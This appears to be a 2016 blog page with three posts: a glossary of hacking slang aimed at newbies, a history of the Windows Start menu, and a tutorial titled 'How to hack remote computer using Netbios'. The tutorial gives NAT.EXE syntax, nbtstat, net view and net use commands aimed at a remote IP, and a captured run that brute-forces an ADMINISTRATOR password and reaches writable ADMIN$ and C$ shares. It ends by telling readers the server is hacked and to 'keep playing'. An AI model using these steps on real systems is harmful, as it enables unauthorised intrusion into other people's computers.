Monday, 29 February 2016

Hackers Dictionary

                             
If you are a newbie in hacking then you need to learn some things. There are some terms that every hacker should know about them. Some words and abbreviations that you should know.
Some words you need to know about
Algorithm - A series of steps specifying which actions to take in which order. 
ANSI Bomb - ANSI.SYS key-remapping commands consist of cryptic-looking text that specifies, using ansi numeric codes to redefine keys. 
Back Door - Something a hacker leaves behind on a system in order to be able to get back in at a later time. 
Binary - A numbering system in which there are only two possible values for each digit: 0 and 1. 
Black Hat - A hacker who performs illegal actions to do with hacking online. (Bad guy, per se) 
Blue Hat - A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events. 
Bot - A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions. 
Botnet - Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks. 
Buffer Overflow - A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing. 
Cracker - A specific type of hacker who decrypts passwords or breaks software copy protection schemes. 
DDoS - Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter. 
Deface - A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site. 
Dictionary Attack - A dictionary attack is an attack in which a cyber criminal can attempt to gain your account password. The attack uses a dictionary file, a simple list of possible passwords, and a program which fills them in. The program just fills in every single possible password on the list, untill it has found the correct one. Dictionary files usually contain the most common used passwords. 
DOX - Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc. 
E-Whore - A person who manipulates other people to believe that he/she is a beautiful girl doing cam shows or selling sexual pictures to make money. 
Encryption - In cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is apply the reverse mathematical operations. In technical speak, encryption is applies mathematical algorithms with a key that converts plaintext to ciphertext. Only someone in possession of the key can decrypt the message. 
Exploit - A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it. 
FUD - Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone. 
Grey Hat - A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.Hacker (definition is widely disputed among people...) = A hacker is someone who is able to manipulate the inner workings of computers, information, and technology to work in his/her favor. 
Hacktivist -  A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks. 
IP Address - On the Internet, your IP address is the unique number that others use to send you traffic. 
IP Grabber - A link that grabs someone's IP when they visit it. Keylogger - A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.Leach = A cultural term in the warez community referring to people who download lots of stuff but never give back to the community. 
LOIC/HOIC - Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances. 
Malware - Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave. Neophyte = A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking. 
smith - Somebody new to a forum/game. 
OldFag - Somebody who's been around a forum/game for a long time. 
Packet - Data that is sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end. 
Phreak - Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc. 
Phreaking - The art and science of cracking the phone network. Proxy - A proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers. Rainbow Table - A rainbow table is a table of possible passwords and their hashes. It is way faster to crack a password using rainbow tables then using a dictionary attack (Bruteforce). 
Remote Administration Tool - A tool which is used to remotely control (an)other machine(s). These can be used for monitoring user actions, but often misused by cyber criminals as malware, to get their hands on valuable information, such as log in credentials. Resolver - Software created to get an IP address through IM (instant messenger, like Skype/MSN) programs. 
Reverse Engineering - A technique whereby the hacker attempts to discover secrets about a program. Often used by crackers, and in direct modifications to a process/application. 
Root - Highest permission level on a computer, able to modify anything on the system without restriction. 
Rootkit (ring3 ring0) - A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode. 
Script Kiddie - A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking. 
Shell - The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter. OR A shell is an script-executing unit - Something you'd stick somewhere in order to execute commands of your choice. 
Social Engineer - Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazoned across the outside of the letter. As you can see, social engineering is not unique to hackers; it's main practitioners are the marketing departments of corporations. 
Spoof - The word spoof generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing). (Spoofing an extension for a RAT to change it from .exe to .jpg, etc.) 
SQL Injection - An SQL injection is a method often used to hack SQL databases via a website, and gain admin control (sometimes) of the site. You can attack programs with SQLi too. 
Trojan - A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer. 
VPS - The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionallyequivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software. Warez - Software piracy 
White Hat - A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se) 
Worm - Software designed to spread malware with little to no human interaction. Zero Day Exploit = An attack that exploits a previously unknown vulnerability in a computer application, meaning that the attack occurs on "day zero" of awareness of the vulnerability. This means that the developers have had zero days to address and patch the vulnerability.
Abbreviations
DDoS - Distributed Denial of Service 
DrDoS - Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's coming from multiple ips. Amplification of power in the attack COULD occur. 
FTP - File Transfer Protocol. Used for transferring files over an FTP server. 
FUD - Fully Undetectable 
Hex - In computer science, hexadecimal refers to base-16 numbers. These are numbers that use digits in the range: 0123456789ABCDEF. In the C programming language (as well as Java, JavaScript, C++, and other places), hexadecimal numbers are prefixed by a 0x. In this manner, one can tell that the number 0x80 is equivalent to 128 decimal, not 80 decimal. 
HTTP - Hyper Text Transfer Protocol. The foundation of data communication for the World Wide Web. 
IRC - Internet Relay Chat. Transmiting text messages in real time between online users. 
JDB - Java drive-by, a very commonly used web-based exploit which allows an attacker to download and execute malicious code locally on a slave's machine through a widely known java vulnerability. 
Malware - Malicious Software 
Nix - Unix based operating system, usually refered to here when refering to DoS'ing. 
POP3 - This is the most popular protocol for picking up e-mail from a server. 
R.A.T - Remote Administration Tool 
SDB - Silent drive-by, using a zero day web-based exploit to hiddenly and un-detectably download and execute malicious code on a slave's system. (similar to a JDB however no notification or warning is given to the user) 
SE -  Social Engineering 
Skid - Script Kid/Script Kiddie 
SMTP - A TCP/IP protocol used in sending and receiving e-mail. SQL - Structured Query Language. It's a programming language, that used to communicate with databases and DBMS. Can go along with a word after it, such as "SQL Injection." 
SSH - Secure Shell, used to connect to Virtual Private Servers.  
TCP -  Transmission Control Protocol, creates connections and exchanges packets of data. 
UDP - User Datagram Protocol, An alternative data transport to TCP used for DNS, Voice over IP, and file sharing. 
VPN - Virtual Private Network 
VPS - Virtual Private Server 
XSS (CSS) - Cross Site Scripting 

You should learn this all. Else you will stay a newbie.

Thursday, 25 February 2016

A HISTORY OF THE WINDOWS START MENU


Microsoft's most identifiable product has had 20 years of ups and downs

Microsoft’s Start menu is a big deal. It’s the first thing many people think of when they think of Windows, or even Microsoft. The simple Start menu has existed for more than 20 years now. It started off as a way to make Windows easier to use, and now it’s the center of how we interact with Windows on a daily basis. Whether it’s launching apps, searching for documents, or simply shutting down your PC, you probably use the Start menu more than you think.
Microsoft’s Start menu made its first appearance with Windows 95. It quickly became the go-to menu to find everything you needed from your PC, and it changed very little until the blue-and-green theme of Windows XP. The Start menu became so intertwined with the identity of Windows that users freaked out when it disappeared in Windows 8. It didn’t take long for Microsoft to reverse course: the Start menu was brought back to life with Windows 10.
Microsoft has tried a variety of different Start menus over the years, but the Windows 10 version is the best combination of the modern ideas the company has attempted and the classic menu. The Start menu is iconic, and it’s the identity of Windows. As long as Microsoft doesn’t have any crazy ideas, it’s probably here to stay for many, many more years.
Twenty years is a long time for any software, so let’s take a look at how exactly the Start menu, and by extension, Windows itself, has changed since Windows 95.

Start me up

Windows 95 Back in 1995, people lined up at midnight to get Microsoft’s latest release of Windows, and it was the first version, alongside the enterprise-focused Windows NT 4, to introduce the Start menu. It was designed to make Windows easier to use, and group or organize applications in a list. Before it arrived, Windows users could access apps through Program Manager. It was largely a basic list of apps, with no real organization. While Program Manager did have smaller menus, most Windows users simply launched apps and used it as a list. Windows needed an overhaul. The Start menu was just that overhaul to bring Windows into the next era of computing.
Windows 95’s Start menu arrived alongside the taskbar. The taskbar offered quick access to volume options, the time and date, and even an indication of network activity. Any apps that you launched in Windows 95 would sit neatly on the taskbar, making them easy to leave open and access repeatedly, and you’d find most of them from the new Start menu. Microsoft kept the idea of a list of apps in its new menu, but it was laid out into categories and neatly organized and you could simply drag and drop apps into place. The menu itself became the default way to launch apps from a simple click of the Start button.
The combination of Start button and menu meant you always activated the menu from the lower left-hand side. Even when other apps were used, the Start button was always visible and ready to be used to access additional apps or folders. It negated the need to use Command Prompt for the vast majority of users, and became familiar as the first place you’d check to find documents, help, settings, or just the ability to turn your PC off.
It kickstarted a trend in Windows that has lasted more than 20 years, and made it easy for people new to computers to easily navigate around. The Start menu was also an efficient way to store and organize a lot of quick shortcuts in one place.
Windows 98 - 2000 At first glance, the Windows 98 Start menu doesn’t look very different to the original. A new log off option to support 98’s new multi-user interface was added alongside the same iconography, layout, and basic functions as the Windows 95 version. Beyond that, Windows 98’s Start menu ushered in the internet era. Microsoft added a favorites folder on the Start menu to complement the bundling of Internet Explorer with Windows 98. Most of the internet-related features were designed for the active desktop with widgets, but the Windows 98 Start menu played a small, but important role in making Windows a little more internet friendly.
The taskbar saw bigger changes. Microsoft introduced a new Quick Launch section that let Windows 98 users pin their favorite apps. Quick Launch also included the "show desktop" option to quickly check the desktop and minimize open apps, even when apps were maximized to take up the entire screen. As the desktop contained widgets and Windows users love to save documents to the desktop, the show desktop feature became a useful option to complement the taskbar, desktop, and Start menu.
Windows ME might have been full of bugs and issues (it didn’t earn its nickname "Windows Mistake Edition" for nothing), but the Start menu remained a consistent and stable feature. Little changed from the Windows 98 version, but Microsoft decided to place the full Windows ME branding along the side of the menu. That made it look a little ugly, but it was the last time we’d see this type of layout and design for the default version of the Start menu.
Windows 2000 was designed for professionals, but the Start menu was almost identical to Windows ME. Microsoft made some minor changes to pin Windows Update and set program access and defaults to the top of the Start menu. It was a quicker way to access settings to uninstall apps or change default apps, and the Windows Update shortcut was designed to provide quicker access to all important security updates.
Just like Windows ME, the taskbar in Windows 2000 remained relatively unchanged from Windows 98. This is the last time we’ll see the traditional gray interface as the default setting for the Start menu.

New experiences

Windows XP - Windows 7 Windows XP gave us the first significant visual overhaul to the Start menu since Windows 95. It looked radically different. Microsoft picked a blue-and-green theme for XP’s Start menu, and many were quick to criticize its "Fisher Price" look at the time. The blue theme extended into the entire taskbar, and Microsoft began tweaking the system tray to hide unused icons by default. It was easy to get them back and drop them into the full system tray, but it helped keep the system tray under control at a time when many app developers started taking advantage of it.
The actual Start menu itself split into two panes, with regularly used or pinned apps on the left and quick access to documents, settings, help, and search on the right. It was familiar, but also very different. The traditional application list on the Start menu was accessible from the All Programs link, and if you really wanted the old Start menu back then you could enable a classic theme. At the time, a lot of third-party skinners produced a variety of themes to customize the Start menu and overall look of Windows XP.
Microsoft took its Windows XP Start menu changes and tweaked them even further with Windows Vista. While the Start menu looked similar, there were some fundamental changes that alienated longtime Windows users. Microsoft switched to a transparent menu as part of its futuristic-looking "Aero Glass" theme. It was a visual look that many enjoyed, but the translucent effects were also distracting and irritating at times, not to mention taxing for a lot of older and lower-end PCs. Microsoft extended this theme throughout the Start menu, app windows, taskbar, and even in a new sidebar that contained live gadgets.
The Start menu itself changed to a darker look and feel, with simple icons in the taskbar for the Show desktop option and a new 3D flip interface that tiled apps together. Vista’s Start menu lacked any visual cues for links to documents, the control panel, or other settings, which made it difficult to scan quickly and access these options. It was a long list of text on the right-hand side, and frequent or pinned apps on the left.
Microsoft’s biggest change to the Vista Start menu came with built-in search. In Vista you could simply hit the Windows key and start typing for what you wanted to search for. The importance of the Windows key or Windows logo permeated throughout Microsoft’s keyboards and mice, and a new "ultimate" keyboard shipped with the Windows key in the center to quickly access search or the Start menu. Microsoft also removed the "start" branding from the Vista Start menu, and replaced it with a Windows orb to further push the Windows branding in Vista.
Continuing the trend of tweaks over the years, Microsoft made very few changes to the Start menu with Windows 7. The shutdown button became more prominent and easy to spot, but Microsoft kept the lack of visual elements and flat text for shortcuts. Microsoft tweaked its search feature for the Windows 7 Start menu, with better performance and faster queries for documents and settings.
Most of the Windows 7 interface changes were found in the taskbar or the way apps interacted with each other. Microsoft introduced Aero Snap to let Windows 7 users snap apps side by side. Aero Shake also appeared and allowed users to shake their mouse to initiate the Show desktop command. Microsoft even moved the traditional Show desktop shortcut from the Quick Launch area to the right-hand side of the taskbar.

The beginning is the end is the beginning

Windows 8 - Windows 10 Microsoft decided that it was done with the Start menu for Windows 8. It turned out to be a mistake that alienated and panicked Windows users. The familiar Start menu was replaced with a fullscreen Start screen with colorful Live Tiles. Windows 8 was the most drastic change to the Start menu in its entire existence, and the most drastic change to Windows itself.
Microsoft removed the familiar Start button because the company was focusing on fullscreen touch-friendly apps and design. It made navigating to this new Start screen very difficult. The Start screen itself was designed to look simplistic, but using it was anything but. Microsoft shipped the first version with the built-in apps pinned by default, but no quick access to search or shutdown options. It confused longtime Windows users and proved difficult to learn for new users, and was largely considered too much of a change from the Start menu that existed before.
Most of the changes to the Start menu were related to Live Tiles. These new tiles were designed to promote a new type of app that developers could build. The new "Metro-style" apps ran fullscreen and were mainly designed to be finger-friendly to position Windows 8 as a tablet / desktop operating system. Apps used Live Tiles that stood out on the new Start screen, but it made it more difficult to find the traditional desktop apps that Windows users were accustomed to working with. The traditional desktop was designed to be just another app, with the Start screen taking control of the entire interface.
With the desktop as an "app," that meant the taskbar was also hidden away by default. Most Windows users had grown used to finding the date and time in the lower left-hand side of their screen, but this disappeared unless you hovered your mouse to the four hot corners Microsoft created. It was difficult to navigate, and it was clear that most Windows 8 users just wanted the Start menu back. Some got used to it, but many downloaded third-party apps to bring back the familiar Start menu; 1.5 million people downloaded a Start menu replacement in just a few months from the launch of Windows 8, signalling that Microsoft had more work to do to make people happy with its new Start screen.
Faced with negative feedback from the introduction of Windows 8, Microsoft was forced to address some of it with its Windows 8.1 update. The Start screen persisted, but Microsoft added shutdown and search options, and brought back the familiar Start button in the lower left-hand side. There was a small visual pointer to scroll downwards to access a list of all apps, but the Start screen still wasn’t a popular option for most Windows users.
It still felt like the desktop was hidden underneath this new touch-friendly interface, and many still found it difficult to find.
Windows 10 was really designed to keep the good aspects of Windows 8, but bring back some of the familiarity of Windows 7. Microsoft listened to the feedback this time, but instead of just bringing back the old Start menu from Windows 7, the software maker took the old menu and merged it together with its new Live Tiles. The Tiles serve as a colorful and large canvas to launch or pin favorite apps on the right hand-side, and the left keeps quick access to shutdown options, settings, all apps, and the familiar most used apps column.
Microsoft moved the visual search elements of the Start menu down into the taskbar, but you can still type to search in the Windows 10 Start menu and it’s all part of the same interface. Microsoft’s Cortana digital assistant now sits in the taskbar alongside the Start menu and a new Task View option for a quick view of open apps and virtual desktops. All these changes were designed with desktop and laptop users in mind, and to make everything a lot more familiar and easier to use at the same time.
Start Menu win 10
If you’re coming from Windows 7 and you upgrade to Windows 10, it’s far less jarring than the Windows 8 Start screen experience. Microsoft tried to push a touch-friendly UI in Windows 8, but it has clearly retreated back to the familiarity of the desktop.
The overall interface in Windows 10 is a mix of black and white in most areas. Built-in apps make use of this design the most, but the taskbar and Start menu mix a black theme with touches of transparency. Windows 10 was released more than six months ago, and it appears that most Windows users are happy that the Start menu is back with a fresh design and new features.
The Start menu appears to be back with a vengeance, and this time, it’s here to stay.

How to hack remote computer using Netbios

NetBIOS Attack Methods


This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

Switches:

-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.
<address>
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.

[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.

What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.


C:\nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial NetBIOS 16th bit listing:

Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name

Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
<BF> Network Monitor Name
<BE> Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client

[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:

[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.

[8.0.5] Net Computer: This adds or deletes computers from a domains database.

[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.

[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.

[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.

[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.

[8.1.0] Net Help: Help with these commands

[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.

[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.

[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service.

[8.1.5] Net Print: Displays print jobs and shared queues.

[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.

[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.

[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.

[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.

[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.

[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.

[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.

[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.

[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.

[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:

Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View

For this section, the command being used is the NET VIEW and NET USE commands.

[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.

C:\net view XXX.XX.XXX.XX

Shared resources at XXX.XX.XXX.XX

Share name Type Used as Comment

------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.

NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.


C:\net use /?

The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

C:\net use x: \\XXX.XX.XXX.XX\test

The command completed successfully.

C:\unzipped\nat10bin>net use

New connections will be remembered.

Status Local Remote Network

-------------------------------------------------------------------------------
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network

The command completed successfully.

Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY


[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt

[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:

[*]--- This machine has a browse list:

Server Comment
--------- -------
STUDENT1


[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.